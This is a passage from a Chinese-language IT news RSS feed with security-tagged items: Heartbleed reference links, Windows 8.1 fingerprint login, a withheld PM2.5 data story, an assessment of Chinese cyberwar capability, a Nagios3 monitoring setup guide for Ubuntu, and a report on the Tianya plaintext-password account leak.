  &lt;li&gt;   &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160" target="_blank" title="CVE - CVE-2014-0160"&gt;CVE - CVE-2014-0160&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;   &lt;a href="https://www.openssl.org/news/secadv_20140407.txt" target="_blank" title="OpenSSL &amp;#30340;&amp;#20844;&amp;#21578;: TLS heartbeat read overrun (CVE-2014-0160)"&gt;OpenSSL 的公告: TLS heartbeat read overrun (CVE-2014-0160)&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;   &lt;a href="http://heartbleed.com/" target="_blank" title="Heartbleed Bug"&gt;Heartbleed Bug&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;   &lt;a href="http://share.inside.com.tw/posts/4447" target="_blank" title="Heartbleed&amp;#36039;&amp;#23433;&amp;#28431;&amp;#27934;&amp;#65292;&amp;#25976;&amp;#21313;&amp;#33836;&amp;#20282;&amp;#26381;&amp;#22120;&amp;#21487;&amp;#33021;&amp;#27945;&amp;#23494; - Inside &amp;#32178;&amp;#25688;"&gt;Heartbleed資安漏洞，數十萬伺服器可能洩密 - Inside 網摘&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;   &lt;a href="http://www.oschina.net/news/50576/openssh-heartbleed" target="_blank" title="OpenSSL &amp;#26333;&amp;#20986;&amp;#37325;&amp;#22823;&amp;#32570;&amp;#38519; &amp;#40657;&amp;#23458;&amp;#21487;&amp;#22810;&amp;#27425;&amp;#31434;&amp;#21462;&amp;#25976;&amp;#25818;"&gt;OpenSSL 曝出重大缺陷 黑客可多次竊取數據&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
 &lt;div&gt;  &lt;div&gt;
							   &lt;a href="http://www.facebook.com/tsungnote" target="_blank"&gt;
								    &lt;img alt="Fb-Button" src="http://blog.longwin.com.tw/wp-content/plugins/facebook-button-plugin/img/standart-facebook-ico.png"&gt;&lt;/img&gt;
							&lt;/a&gt;
						&lt;/div&gt;  &lt;div&gt;
							   &lt;div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt; &lt;p&gt;The post   &lt;a href="http://blog.longwin.com.tw/2014/04/openssl-cve-2014-0160-heartbleed-2014/" rel="nofollow"&gt;OpenSSL CVE-2014-0160 Heartbleed 安全漏洞檢測&lt;/a&gt; appeared first on   &lt;a href="http://blog.longwin.com.tw" rel="nofollow"&gt;Tsung&amp;apos;s Blog&lt;/a&gt;.&lt;/p&gt;
 &lt;img height="1" src="http://feeds.feedburner.com/~r/tsungblog/~4/KQ3QLFkZXJ4" width="1"&gt;&lt;/img&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>News news openssl security ssl</category>
      <guid isPermaLink="true">https://itindex.net/detail/49003-openssl-cve-heartbleed</guid>
      <pubDate>Thu, 10 Apr 2014 08:47:00 CST</pubDate>
    </item>
    <item>
      <title>Windows 8.1 新安全特性之一，原生指纹识别支持</title>
      <link>https://itindex.net/detail/44356-windows-%E5%AE%89%E5%85%A8-%E6%8C%87%E7%BA%B9%E8%AF%86%E5%88%AB</link>
      <description>&lt;p&gt;  &lt;a href="http://livesino.net/images/farm26/502141b2ec0f_671F/touchscreen__1_of_1__large_verge_medium_landscape.jpg" rel="ignition"&gt;   &lt;img alt="Windows 8.1 &amp;#26032;&amp;#23433;&amp;#20840;&amp;#29305;&amp;#24615;&amp;#20043;&amp;#19968;&amp;#65292;&amp;#21407;&amp;#29983;&amp;#25351;&amp;#32441;&amp;#35782;&amp;#21035;&amp;#25903;&amp;#25345;" height="394" src="http://livesino.net/images/farm26/502141b2ec0f_671F/touchscreen__1_of_1__large_verge_medium_landscape_thumb.jpg" title="Windows 8.1 &amp;#26032;&amp;#23433;&amp;#20840;&amp;#29305;&amp;#24615;&amp;#20043;&amp;#19968;&amp;#65292;&amp;#21407;&amp;#29983;&amp;#25351;&amp;#32441;&amp;#35782;&amp;#21035;&amp;#25903;&amp;#25345;" width="640"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;就在微软正在召开的   &lt;a href="http://livesino.net/tag/teched" target="_blank"&gt;TechEd 2013&lt;/a&gt; 北美会议上，其中一场 Session 便是介绍   &lt;a href="http://channel9.msdn.com/Events/TechEd/NorthAmerica/2013/WCA-B370#fbid=yEnkHyDqmCo" target="_blank"&gt;Windows 8.1 中改进的那些安全特性&lt;/a&gt;。在 TechEd 现场演示中，演讲者 Chris Hallum 真机演示了 Windows 8.1 原生指纹识别的种种使用场景。&lt;/p&gt;
 &lt;p&gt;  &lt;a href="http://livesino.net/images/farm26/502141b2ec0f_671F/fingerprintwin81.jpg" rel="ignition"&gt;   &lt;img alt="Windows 8.1 &amp;#26032;&amp;#23433;&amp;#20840;&amp;#29305;&amp;#24615;&amp;#20043;&amp;#19968;&amp;#65292;&amp;#21407;&amp;#29983;&amp;#25351;&amp;#32441;&amp;#35782;&amp;#21035;&amp;#25903;&amp;#25345;" height="244" src="http://livesino.net/images/farm26/502141b2ec0f_671F/fingerprintwin81_thumb.jpg" title="Windows 8.1 &amp;#26032;&amp;#23433;&amp;#20840;&amp;#29305;&amp;#24615;&amp;#20043;&amp;#19968;&amp;#65292;&amp;#21407;&amp;#29983;&amp;#25351;&amp;#32441;&amp;#35782;&amp;#21035;&amp;#25903;&amp;#25345;" width="460"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;在   &lt;a href="http://livesino.net/tag/windows-8-1" target="_blank" title="Windows 8.1"&gt;Windows 8.1&lt;/a&gt; 中，指纹识别功能已经原生支持于系统，比如可以指纹锁定某文件夹或应用，也可以快速登录指纹绑定的账户（或远程登录），或是在商店购买内容前的验证 – 微软也正在探索更多使用场景。&lt;/p&gt;
 &lt;p&gt;
&lt;/p&gt; &lt;p&gt;  &lt;a href="http://livesino.net/images/farm26/502141b2ec0f_671F/teched-windows-8-1-finger-6-livesino.png" rel="ignition"&gt;   &lt;img alt="Windows 8.1 &amp;#26032;&amp;#23433;&amp;#20840;&amp;#29305;&amp;#24615;&amp;#20043;&amp;#19968;&amp;#65292;&amp;#21407;&amp;#29983;&amp;#25351;&amp;#32441;&amp;#35782;&amp;#21035;&amp;#25903;&amp;#25345;" height="360" src="http://livesino.net/images/farm26/502141b2ec0f_671F/teched-windows-8-1-finger-6-livesino_thumb.png" title="Windows 8.1 &amp;#26032;&amp;#23433;&amp;#20840;&amp;#29305;&amp;#24615;&amp;#20043;&amp;#19968;&amp;#65292;&amp;#21407;&amp;#29983;&amp;#25351;&amp;#32441;&amp;#35782;&amp;#21035;&amp;#25903;&amp;#25345;" width="640"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Windows 8.1 中新的 PC 设置界面：&lt;/p&gt;
 &lt;p&gt;  &lt;a href="http://livesino.net/images/farm26/502141b2ec0f_671F/teched-windows-8-1-finger-5-livesino.png" rel="ignition"&gt;   &lt;img alt="Windows 8.1 &amp;#26032;&amp;#23433;&amp;#20840;&amp;#29305;&amp;#24615;&amp;#20043;&amp;#19968;&amp;#65292;&amp;#21407;&amp;#29983;&amp;#25351;&amp;#32441;&amp;#35782;&amp;#21035;&amp;#25903;&amp;#25345;" height="360" src="http://livesino.net/images/farm26/502141b2ec0f_671F/teched-windows-8-1-finger-5-livesino_thumb.png" title="Windows 8.1 &amp;#26032;&amp;#23433;&amp;#20840;&amp;#29305;&amp;#24615;&amp;#20043;&amp;#19968;&amp;#65292;&amp;#21407;&amp;#29983;&amp;#25351;&amp;#32441;&amp;#35782;&amp;#21035;&amp;#25903;&amp;#25345;" width="640"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;a href="http://livesino.net/images/farm26/502141b2ec0f_671F/teched-windows-8-1-finger-7-livesino.png" rel="ignition"&gt;   &lt;img alt="Windows 8.1 &amp;#26032;&amp;#23433;&amp;#20840;&amp;#29305;&amp;#24615;&amp;#20043;&amp;#19968;&amp;#65292;&amp;#21407;&amp;#29983;&amp;#25351;&amp;#32441;&amp;#35782;&amp;#21035;&amp;#25903;&amp;#25345;" height="360" src="http://livesino.net/images/farm26/502141b2ec0f_671F/teched-windows-8-1-finger-7-livesino_thumb.png" title="Windows 8.1 &amp;#26032;&amp;#23433;&amp;#20840;&amp;#29305;&amp;#24615;&amp;#20043;&amp;#19968;&amp;#65292;&amp;#21407;&amp;#29983;&amp;#25351;&amp;#32441;&amp;#35782;&amp;#21035;&amp;#25903;&amp;#25345;" width="640"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;微软也称软将提供 API 供开发者加强 Windows Store 应用的隐私保护，比如在一些敏感应用中或即将显示敏感信息前提供指纹扫描要求。根据高级产品推广经理 Michael Niehaus，微软正在和两至三家指纹识别模块生厂商，和更多 PC OEM 合作共同来做好这一平台。&lt;/p&gt;
 &lt;p&gt;指纹识别也会让 Windows 登录变得更加简单。对于宅男宅女来说，指纹锁定文件夹也可以完全代替各类“先进性学习资料”的目录保护。（via   &lt;a href="http://www.theverge.com/2013/6/4/4394486/windows-8-1-fingerprint-reader-support-secure-folders-with-finger" target="_blank" title="Windows 8.1 fingerprint reader support includes option to secure folders with a finger"&gt;The Verge&lt;/a&gt;）&lt;/p&gt;
 &lt;table border="0" cellpadding="3" cellspacing="0"&gt;
    
      &lt;tr&gt;
           &lt;td colspan="5"&gt;    &lt;strong&gt;&lt;/strong&gt;&lt;/td&gt;
    &lt;/tr&gt;
    
          &lt;tr&gt;
                   &lt;td valign="top" width="119"&gt;
                        &lt;a href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Flivesino.net%2Farchives%2F5508.live&amp;from=http%3A%2F%2Flivesino.net%2Farchives%2F5514.live" target="_blank" title="&amp;#24494;&amp;#36719;&amp;#23459;&amp;#24067; Windows 8.1 &amp;#20225;&amp;#19994;&amp;#21151;&amp;#33021;&amp;#26356;&amp;#26032;&amp;#35814;&amp;#24773;"&gt;
                             &lt;img height="113px" src="http://static.wumii.cn/site_images/ti/rKxzTff1.jpg?i=EnM2lvs9" width="113px"&gt;&lt;/img&gt;     &lt;br /&gt;
                        微软宣布 Windows 8.1 企业功能更新详情
                    &lt;/a&gt;
                &lt;/td&gt;
                   &lt;td valign="top" width="119"&gt;
                        &lt;a href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Flivesino.net%2Farchives%2F5510.live&amp;from=http%3A%2F%2Flivesino.net%2Farchives%2F5514.live" target="_blank" title="Windows 8.1 &amp;#21407;&amp;#29983;&amp;#25903;&amp;#25345; Miracast &amp;#26080;&amp;#32447;&amp;#26174;&amp;#31034;&amp;#21644; Internet &amp;#20849;&amp;#20139;"&gt;
                             &lt;img height="113px" src="http://static.wumii.cn/site_images/ti/rKxzTff1.jpg?i=UgQKvWGL" width="113px"&gt;&lt;/img&gt;     &lt;br /&gt;
                        Windows 8.1 原生支持 Miracast 无线显示和 Internet 共享
                    &lt;/a&gt;
                &lt;/td&gt;
                   &lt;td valign="top" width="119"&gt;
                        &lt;a href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Flivesino.net%2Farchives%2F5504.live&amp;from=http%3A%2F%2Flivesino.net%2Farchives%2F5514.live" target="_blank" title="&amp;#24494;&amp;#36719;&amp;#23459;&amp;#24067; Windows 8.1 &amp;#26032;&amp;#20840;&amp;#23616;&amp;#25628;&amp;#32034;"&gt;
                             &lt;img height="113px" src="http://static.wumii.cn/site_images/ti/18WkU9zKX.png?i=12wkZW4a1" width="113px"&gt;&lt;/img&gt;     &lt;br /&gt;
                        微软宣布 Windows 8.1 新全局搜索
                    &lt;/a&gt;
                &lt;/td&gt;
                   &lt;td valign="top" width="119"&gt;
                        &lt;a href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Flivesino.net%2Farchives%2F5490.live&amp;from=http%3A%2F%2Flivesino.net%2Farchives%2F5514.live" target="_blank" title="&amp;#24494;&amp;#36719;&amp;#27491;&amp;#24335;&amp;#30830;&amp;#35748;&amp;#24320;&amp;#22987;&amp;#25353;&amp;#38062;&amp;#21152;&amp;#20837; Windows 8.1"&gt;
                             &lt;img height="113px" src="http://static.wumii.cn/site_images/ti/mLwWkPcY.png?i=3YPlVxLp" width="113px"&gt;&lt;/img&gt;     &lt;br /&gt;
                        微软正式确认开始按钮加入 Windows 8.1
                    &lt;/a&gt;
                &lt;/td&gt;
                   &lt;td valign="top" width="119"&gt;
                        &lt;a href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Flivesino.net%2Farchives%2F5500.live&amp;from=http%3A%2F%2Flivesino.net%2Farchives%2F5514.live" target="_blank" title="Windows 8.1 &amp;#39318;&amp;#27425;&amp;#25259;&amp;#38706;&amp;#32454;&amp;#33410;&amp;#34917;&amp;#20805;"&gt;
                             &lt;img height="113px" src="http://static.wumii.cn/site_images/ti/55xLLTCw.jpg?i=1bx1gmAuP" width="113px"&gt;&lt;/img&gt;     &lt;br /&gt;
                        Windows 8.1 首次披露细节补充
                    &lt;/a&gt;
                &lt;/td&gt;
        &lt;/tr&gt;
    
      &lt;tr&gt;
           &lt;td align="right" colspan="5"&gt;
                &lt;a href="http://www.wumii.com/widget/relatedItems" target="_blank" title="&amp;#26080;&amp;#35269;&amp;#30456;&amp;#20851;&amp;#25991;&amp;#31456;&amp;#25554;&amp;#20214;"&gt;
                无觅
            &lt;/a&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
&lt;/table&gt; &lt;p&gt;©2013   &lt;a href="http://livesino.net"&gt;LiveSino.net&lt;/a&gt; |   &lt;a href="http://livesino.net/archives/5514.live" title="Windows 8.1 &amp;#26032;&amp;#23433;&amp;#20840;&amp;#29305;&amp;#24615;&amp;#20043;&amp;#19968;&amp;#65292;&amp;#21407;&amp;#29983;&amp;#25351;&amp;#32441;&amp;#35782;&amp;#21035;&amp;#25903;&amp;#25345;"&gt;阅读原文&lt;/a&gt; |   &lt;a href="http://livesino.net/archives/5514.live#comments" title="Windows 8.1 &amp;#26032;&amp;#23433;&amp;#20840;&amp;#29305;&amp;#24615;&amp;#20043;&amp;#19968;&amp;#65292;&amp;#21407;&amp;#29983;&amp;#25351;&amp;#32441;&amp;#35782;&amp;#21035;&amp;#25903;&amp;#25345; &amp;#30340;&amp;#35780;&amp;#35770;"&gt;添加评论&lt;/a&gt;&lt;/p&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>资讯 Devices Hardware Security TechEd</category>
      <guid isPermaLink="true">https://itindex.net/detail/44356-windows-%E5%AE%89%E5%85%A8-%E6%8C%87%E7%BA%B9%E8%AF%86%E5%88%AB</guid>
      <pubDate>Wed, 05 Jun 2013 08:44:04 CST</pubDate>
    </item>
    <item>
      <title>南京追究泄露PM2.5数据者责任</title>
      <link>https://itindex.net/detail/34054-%E5%8D%97%E4%BA%AC-pm2-%E6%95%B0%E6%8D%AE</link>
      <description>wmr 写道 &amp;quot;11月14日，“南京气象”官方微博发布了一条气象预报。此条信息特别提到了南京市PM2.5的范围是&amp;amp;gt;=75微克/立方米：“近日南京大气层结构稳定，虽天气晴好，但PM2.5细微颗粒物浓度大都在75微克/立方米以上，请注意自我防护……”。此条信息不久后被删除。南京气象台解释说他们的确在监测PM2.5数值，但以科研为目的，不宜公布。江苏省环保部门则表示，需要国家将PM2.5正式纳入评价指标并公布具体监测标准后，环保部门方可发布。国际卫生组织建议的健康线是10微克每立方米。据报道，擅自发表数据者已被追究责任。 记者闾丘露薇在《南都周刊》撰文表示北京市环保局也一直在测量PM2.5数据，但不得公布。&amp;quot;&lt;img width="1" height="1" src="http://solidot.org.feedsportal.com/c/33236/f/556826/s/1a270abd/mf.gif" border="0"&gt;&lt;div&gt;&lt;table border="0"&gt;&lt;tr&gt;&lt;td valign="middle"&gt;&lt;a href="http://res.feedsportal.com/viral/sendemail2.html?title=%E5%8D%97%E4%BA%AC%E8%BF%BD%E7%A9%B6%E6%B3%84%E9%9C%B2PM2.5%E6%95%B0%E6%8D%AE%E8%80%85%E8%B4%A3%E4%BB%BB&amp;amp;link=http%3A%2F%2Fscience.solidot.org%2Farticle.pl%3Fsid%3D11%2F11%2F17%2F023248%26amp%3Bfrom%3Drss"&gt;&lt;img src="http://res3.feedsportal.com/images/emailthis2.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;td valign="middle"&gt;&lt;a href="http://res.feedsportal.com/viral/bookmark.cfm?title=%E5%8D%97%E4%BA%AC%E8%BF%BD%E7%A9%B6%E6%B3%84%E9%9C%B2PM2.5%E6%95%B0%E6%8D%AE%E8%80%85%E8%B4%A3%E4%BB%BB&amp;amp;link=http%3A%2F%2Fscience.solidot.org%2Farticle.pl%3Fsid%3D11%2F11%2F17%2F023248%26amp%3Bfrom%3Drss"&gt;&lt;img src="http://res3.feedsportal.com/images/bookmark.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;br&gt;&lt;br&gt;&lt;a href="http://da.feedsportal.com/r/118101798847/u/49/f/556826/c/33236/s/1a270abd/a2.htm"&gt;&lt;img src="http://da.feedsportal.com/r/118101798847/u/49/f/556826/c/33236/s/1a270abd/a2.img" border="0"&gt;&lt;/a&gt;&lt;div&gt;
&lt;a href="http://feeds.feedburner.com/~ff/solidot?a=a7MmlByHMY4:iZSi5kz4h9I:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/solidot?d=yIl2AUoC8zA" border="0"&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/solidot?a=a7MmlByHMY4:iZSi5kz4h9I:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/solidot?d=7Q72WNTAKBA" border="0"&gt;&lt;/a&gt;
&lt;/div&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>security</category>
      <guid isPermaLink="true">https://itindex.net/detail/34054-%E5%8D%97%E4%BA%AC-pm2-%E6%95%B0%E6%8D%AE</guid>
      <pubDate>Thu, 17 Nov 2011 10:08:00 CST</pubDate>
    </item>
    <item>
      <title>中国的网络战能力被夸大了</title>
      <link>https://itindex.net/detail/33744-%E4%B8%AD%E5%9B%BD-%E7%BD%91%E7%BB%9C%E6%88%98-%E5%A4%B8%E5%A4%A7</link>
      <description>澳大利亚国立大学战略与防务研究中心教授Desmond Ball发表了一篇研究报告(PDF)，认为中国的网络战攻击能力十分有限，它自身的网络安全存在显著缺陷，更容易受到攻击。 Ball称，虽然最近几年中国完成了多起引人注目的成功入侵、拒绝服务攻击和网站内容纂改，但它的攻击能力非常原始。他们使用的病毒和木马很容易在造成破坏前被检测出和清除掉。没有证据证明中国的网络战士兵能渗透进高度安全的网络，或者是秘密偷窃或伪造敏感数据。中国的网络战能力具有破坏性，但并不能完成复杂的信息战任务，无法有系统的削弱对手的指挥控制、空中防御、情报网络和资料库。换句话说，只有在先发制人的时候他们才会表现的最为突出。&lt;img width="1" height="1" src="http://solidot.org.feedsportal.com/c/33236/f/556826/s/19c0efcd/mf.gif" border="0"&gt;&lt;div&gt;&lt;table border="0"&gt;&lt;tr&gt;&lt;td valign="middle"&gt;&lt;a href="http://res.feedsportal.com/viral/sendemail2.html?title=%E4%B8%AD%E5%9B%BD%E7%9A%84%E7%BD%91%E7%BB%9C%E6%88%98%E8%83%BD%E5%8A%9B%E8%A2%AB%E5%A4%B8%E5%A4%A7%E4%BA%86&amp;amp;link=http%3A%2F%2Finternet.solidot.org%2Farticle.pl%3Fsid%3D11%2F11%2F02%2F0754234%26amp%3Bfrom%3Drss"&gt;&lt;img src="http://res3.feedsportal.com/images/emailthis2.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;td valign="middle"&gt;&lt;a href="http://res.feedsportal.com/viral/bookmark.cfm?title=%E4%B8%AD%E5%9B%BD%E7%9A%84%E7%BD%91%E7%BB%9C%E6%88%98%E8%83%BD%E5%8A%9B%E8%A2%AB%E5%A4%B8%E5%A4%A7%E4%BA%86&amp;amp;link=http%3A%2F%2Finternet.solidot.org%2Farticle.pl%3Fsid%3D11%2F11%2F02%2F0754234%26amp%3Bfrom%3Drss"&gt;&lt;img src="http://res3.feedsportal.com/images/bookmark.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;br&gt;&lt;br&gt;&lt;a href="http://da.feedsportal.com/r/117795426245/u/49/f/556826/c/33236/s/19c0efcd/a2.htm"&gt;&lt;img src="http://da.feedsportal.com/r/117795426245/u/49/f/556826/c/33236/s/19c0efcd/a2.img" border="0"&gt;&lt;/a&gt;&lt;div&gt;
&lt;a href="http://feeds.feedburner.com/~ff/solidot?a=Go5kNVh_V0U:FYZiNQleEf0:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/solidot?d=yIl2AUoC8zA" border="0"&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/solidot?a=Go5kNVh_V0U:FYZiNQleEf0:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/solidot?d=7Q72WNTAKBA" border="0"&gt;&lt;/a&gt;
&lt;/div&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>security</category>
      <guid isPermaLink="true">https://itindex.net/detail/33744-%E4%B8%AD%E5%9B%BD-%E7%BD%91%E7%BB%9C%E6%88%98-%E5%A4%B8%E5%A4%A7</guid>
      <pubDate>Wed, 02 Nov 2011 15:42:00 CST</pubDate>
    </item>
    <item>
      <title>在 Ubuntu Server 上尝试 Nagios3</title>
      <link>https://itindex.net/detail/34634-ubuntu-server-nagios3</link>
      <description>&lt;p&gt;  &lt;a href="http://raynix.info/wp-content/uploads/2011/12/Workspace-1_279.png"&gt;   &lt;img alt="" height="205" src="http://raynix.info/wp-content/uploads/2011/12/Workspace-1_279-1024x382.png" title="Workspace 1_279" width="550"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Nagios (据说)是业内一流的系统监控软件框架. 但我这样一个非一流的 Linux 系统管理员, 之前由于管理的系统实在是少. 加上 Linux 自身的强壮, 于是似乎不怎么管也不会出事. 进而, 我之前一直都没有应用 Nagios 的良好动机.&lt;/p&gt;
 &lt;p&gt;最近, 负载我这小 blog 的VPS有些小小的情绪化行为. 可能是大环境不好吧. 于是我打算用 Nagios 监控一下.&lt;/p&gt;
 &lt;p&gt;在2009年我买了一本&amp;lt;Linux Networking Cookbook&amp;gt;, 上面对 Nagios 的讲解倒是蛮详细的, 但也有些吓人: 从编译开始的... 我在 Ubuntu Server 上测试了一下, 貌似很简单的. 首先:&lt;/p&gt;
 &lt;blockquote&gt;  &lt;p&gt;$sudo  apt-cache search nagios&lt;/p&gt;&lt;/blockquote&gt;
 &lt;p&gt;发现当前的版本是 nagios3 了, 于是:&lt;/p&gt;
 &lt;blockquote&gt;  &lt;p&gt;$sudo apt-get install nagios3&lt;/p&gt;&lt;/blockquote&gt;
 &lt;p&gt;过程中会要求输入一个 password, 其实就是教程里使用 httpasswd 生成的用于保护 nagios 的口令. 之后使用浏览器查看:&lt;/p&gt;
 &lt;blockquote&gt;  &lt;p&gt;http://localhost/nagios3&lt;/p&gt;&lt;/blockquote&gt;
 &lt;p&gt;就能看到基本的监测界面了. 相当简单吧. 下一步如果要添加额外的需要监控的网站, 仅需要利用现有的 generic-host 模板设置新站点信息即可, 例如:&lt;/p&gt;
 &lt;blockquote&gt;  &lt;p&gt;define host{   &lt;br /&gt;
use        generic-host   &lt;br /&gt;
host_name    raynix   &lt;br /&gt;
alias        raynix   &lt;br /&gt;
address       184.82.236.44   &lt;br /&gt;
}&lt;/p&gt;&lt;/blockquote&gt;
 &lt;p&gt;然后, 记得要把上面的配置存到一个.cfg文件, 并复制或者链接到 /etc/nagios3/conf.d 文件夹. 定义了 host, 然后需要把 host 添加到需要检测的主机群(host group)里就完成了. 例如要将 raynix 添加到 http-servers, 这样就可以让 nagios 检测主机 raynix 上的 httpd 服务了.&lt;/p&gt;
 &lt;p&gt;打开: /etc/nagios3/conf.d/hostgroups_nagios2.cfg (为什么是 nagios2 呢?)&lt;/p&gt;
 &lt;blockquote&gt;  &lt;p&gt;define hostgroup {   &lt;br /&gt;
hostgroup_name  http-servers   &lt;br /&gt;
alias           HTTP servers   &lt;br /&gt;
members         localhost,raynix   &lt;br /&gt;
}&lt;/p&gt;&lt;/blockquote&gt;
 &lt;p&gt;然后重新启动 nagios3 服务, 就可以以缺省的设置对主机 raynix 的 http 服务进行监测了. 另外如果要接收提示邮件的话, 需要修改 /etc/nagios3/conf.d/contacts_nagios2.cfg.   &lt;img alt=":)" src="http://raynix.info/wp-includes/images/smilies/icon_smile.gif"&gt;&lt;/img&gt; &lt;/p&gt;
 &lt;hr&gt;&lt;/hr&gt;
 &lt;p&gt;  &lt;small&gt;© raynix for    &lt;a href="http://raynix.info"&gt;#raynix&amp;apos;s notes&lt;/a&gt;, 2011. |
   &lt;a href="http://raynix.info/archives/2094"&gt;Permalink&lt;/a&gt; |
   &lt;a href="http://raynix.info/archives/2094#comments"&gt;唉, 一个评论都没&lt;/a&gt; |
Add to
   &lt;a href="http://del.icio.us/post?url=http://raynix.info/archives/2094&amp;title=&amp;#22312; Ubuntu Server &amp;#19978;&amp;#23581;&amp;#35797; Nagios3"&gt;del.icio.us&lt;/a&gt;
   &lt;br /&gt;
Post tags:    &lt;br /&gt;
&lt;/small&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;small&gt;Feed enhanced by    &lt;a href="http://planetozh.com/blog/my-projects/wordpress-plugin-better-feed-rss/"&gt;Better Feed&lt;/a&gt; from     &lt;a href="http://planetozh.com/blog/"&gt;Ozh&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;
 &lt;img height="1" src="http://feeds.feedburner.com/~r/raynix/~4/aNUG7xL1oXQ" width="1"&gt;&lt;/img&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>Free software Internet Security Opensource</category>
      <guid isPermaLink="true">https://itindex.net/detail/34634-ubuntu-server-nagios3</guid>
      <pubDate>Mon, 19 Dec 2011 08:47:23 CST</pubDate>
    </item>
    <item>
      <title>天涯四千万用户帐号泄漏，密码为明文</title>
      <link>https://itindex.net/detail/34818-%E5%A4%A9%E6%B6%AF-%E5%8D%83%E4%B8%87-%E7%94%A8%E6%88%B7</link>
      <description>天涯网站证实其用户数据库遭泄漏，黑客泄漏了大约1.7G的资料，包括了天涯4000万用户的用户账号、密码、邮箱。而再次令人吃惊的是密码是明文。 天涯的声明称，“由于历史原因，天涯社区早期使用过明文密码，此次被盗的数据为2009年之前的备份数据。2010年之后，我们升级改造了天涯社区用户账号管理功能，解决了天涯社区用户账号的各种安全性问题。”这与CSDN的声明极其相似。为什么这些大网站都提到2009年进行了备份？为什么密码全是明文？现在又不是1999年，密码加密也不是什么难事。这些巧合不由让人浮想联翩：2009年官方曾经下达过许多整顿互联网的通知，关闭过大量网站，甚至一度要求所有电脑安装绿坝，封锁掉了Twitter和Facebook 等网站，国内大网站可能还接到一些特殊的要求。&lt;img width="1" height="1" src="http://solidot.org.feedsportal.com/c/33236/f/556826/s/1b42b1e9/mf.gif" border="0"&gt;&lt;div&gt;&lt;table border="0"&gt;&lt;tr&gt;&lt;td valign="middle"&gt;&lt;a href="http://res.feedsportal.com/viral/sendemail2.html?title=%E5%A4%A9%E6%B6%AF%E5%9B%9B%E5%8D%83%E4%B8%87%E7%94%A8%E6%88%B7%E5%B8%90%E5%8F%B7%E6%B3%84%E6%BC%8F%EF%BC%8C%E5%AF%86%E7%A0%81%E4%B8%BA%E6%98%8E%E6%96%87&amp;amp;link=http%3A%2F%2Finternet.solidot.org%2Farticle.pl%3Fsid%3D11%2F12%2F26%2F0050214%26amp%3Bfrom%3Drss"&gt;&lt;img src="http://res3.feedsportal.com/images/emailthis2.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;td valign="middle"&gt;&lt;a href="http://res.feedsportal.com/viral/bookmark.cfm?title=%E5%A4%A9%E6%B6%AF%E5%9B%9B%E5%8D%83%E4%B8%87%E7%94%A8%E6%88%B7%E5%B8%90%E5%8F%B7%E6%B3%84%E6%BC%8F%EF%BC%8C%E5%AF%86%E7%A0%81%E4%B8%BA%E6%98%8E%E6%96%87&amp;amp;link=http%3A%2F%2Finternet.solidot.org%2Farticle.pl%3Fsid%3D11%2F12%2F26%2F0050214%26amp%3Bfrom%3Drss"&gt;&lt;img src="http://res3.feedsportal.com/images/bookmark.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;br&gt;&lt;br&gt;&lt;a href="http://da.feedsportal.com/r/121587869932/u/49/f/556826/c/33236/s/1b42b1e9/a2.htm"&gt;&lt;img src="http://da.feedsportal.com/r/121587869932/u/49/f/556826/c/33236/s/1b42b1e9/a2.img" border="0"&gt;&lt;/a&gt;&lt;div&gt;
